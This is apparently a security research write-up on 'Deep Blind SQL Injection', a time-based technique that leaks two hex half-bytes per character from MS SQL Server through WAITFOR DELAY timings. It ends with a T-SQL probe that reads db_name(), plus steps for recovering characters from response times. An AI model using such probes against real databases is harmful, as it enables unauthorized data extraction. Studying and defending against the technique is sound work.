Deep Blind SQL Injection
Ferruh Mavituna, www.portcullis-security.com

Blind SQL Injection attacks are described in several papers [1]. If the injection point is completely blind [2], the only way [3] to extract data is a time-based attack using WAITFOR DELAY, BENCHMARK or a similar function. When it comes to reading data there are two known ways:

1. Reading the data bit by bit
2. Reading the data through a binary search over character patterns

Both methods share a one request, one response limit: each request answers a single yes/no question, so on average six requests to the server are needed for each character.

In Deep Blind SQL Injection reading data is more complex than in classic blind injection. It is still possible to retrieve data, and with a 66% reduction in the number of requests made to the server: two rather than six requests per character. Deep Blind SQL Injection works well against MS SQL Server and may work in other databases such as Oracle, PostgreSQL etc.

The method retrieves more than one bit per request by using differences in the time delay. Each character is read as two half-bytes (hex digits), and the value of a half-byte is encoded as a multiple of a base delay. For example, with a multiplier of 2 seconds: if the first half-byte of the character is 6, the database waits for 12 seconds; if the second half-byte is 1, it waits for 2 seconds. The attacker records the server response times and divides them by 2 to recover the half-byte values. In two requests this yields 0x61, which is 'a'. Depending on the conditions it is possible to use larger or smaller multipliers than 2.
In Practice

A working implementation of this attack for SQL Server uses three placeholders:

{QUERY} is the data you want to read. This can be a variable such as USER, a function such as db_name(2), or a SELECT statement that returns one row and one column.

{POSITION} is the half-byte you want to read. Add 2 to the position to skip the "0x" prefix at the beginning of the hex string SQL Server returns.

{SECONDS} is the multiplier for the wait time. The waiting time can be tweaked down to milliseconds, also by using fractions such as WAITFOR DELAY '0:0:0.51'.

The same code can be written in a slightly different, shorter but less readable form.

Reality of Attacks

Deep Blind SQL Injection is in general not suited to manual attacks; it is advisable to automate it, which has been done in "BSQL Hacker" for SQL Server [4].

Limitations

- Unstable in environments where the connection is slow or other factors lead to unpredictable server response times.
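The following T-SQL batch is an added example of one Deep Blind SQL Injection probe; it is not the paper's own listing, which is not reproduced on this page. It reads a single half-byte of db_name() and encodes its value as a WAITFOR DELAY of value x multiplier seconds. The concrete values are assumptions standing in for the placeholders above: {QUERY} = db_name(), {POSITION} = 1 (the first half-byte of the first character) and {SECONDS} = 2. master.dbo.fn_varbintohexstr is used here as one way to obtain the 0x-prefixed hex string the text refers to.

```sql
-- Added example: one Deep Blind SQL Injection probe for SQL Server.
-- Not the paper's own listing. Assumed values: {QUERY} = db_name(),
-- {POSITION} = 1 (first half-byte of the first character), {SECONDS} = 2.
DECLARE @hex    varchar(8000);
DECLARE @nibble int;
DECLARE @delay  varchar(12);

-- Hex-encode the result. Cast through varchar so each character is one byte
-- (an nvarchar result would give UTF-16 byte pairs). fn_varbintohexstr returns
-- lowercase hex with a leading '0x', e.g. '0x6d6173746572' for 'master'.
SET @hex = master.dbo.fn_varbintohexstr(
               CAST(CAST(db_name() AS varchar(4000)) AS varbinary(8000)));

-- Pick half-byte {POSITION}; the + 2 skips the '0x' prefix.
SET @nibble = ASCII(SUBSTRING(@hex, 1 + 2, 1));

-- Map the hex digit's ASCII code to its value 0..15:
-- '0'..'9' are codes 48..57, 'a'..'f' are codes 97..102.
IF @nibble > 57
    SET @nibble = @nibble - 87
ELSE
    SET @nibble = @nibble - 48;

-- Delay = half-byte value * {SECONDS}. With a multiplier of 2, 'm' (0x6d)
-- makes this probe wait 12 s; the probe for position 2 would wait 26 s.
SET @delay = '0:0:' + CAST(@nibble * 2 AS varchar(4));
WAITFOR DELAY @delay;
```

To recover the character at byte index i (1-based) of the result, send the probe once with position 2i-1 and once with position 2i, subtract the baseline round-trip time of a request without the delay, divide each remaining time by the multiplier and round to the nearest integer; the two values are the high and low half-bytes. The multiplier has to be large enough that two adjacent half-byte values, which differ by exactly one multiplier, cannot be confused by network jitter or server load, which is the instability noted under Limitations. The maximum delay per probe is 15 x {SECONDS}, 30 seconds with the multiplier used here.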